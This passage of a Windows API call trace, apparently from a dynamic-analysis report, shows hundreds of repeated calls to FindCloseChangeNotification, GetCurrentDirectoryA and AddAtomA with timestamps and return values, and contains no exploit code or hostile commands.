[0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.578] AddAtomA (lpString=0x0) returned 0x0 [0130.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.579] AddAtomA (lpString=0x0) returned 0x0 [0130.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.580] AddAtomA (lpString=0x0) returned 0x0 [0130.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.581] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.582] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.582] AddAtomA (lpString=0x0) returned 0x0 [0130.582] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.583] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.583] AddAtomA (lpString=0x0) returned 0x0 [0130.583] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.584] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.584] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.584] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.585] AddAtomA (lpString=0x0) returned 0x0 [0130.585] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.585] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.586] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.586] AddAtomA (lpString=0x0) returned 0x0 [0130.586] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.587] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.587] AddAtomA (lpString=0x0) returned 0x0 [0130.587] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.588] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.588] AddAtomA (lpString=0x0) returned 0x0 [0130.588] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA (lpString=0x0) returned 0x0 [0130.589] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.589] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0130.589] AddAtomA 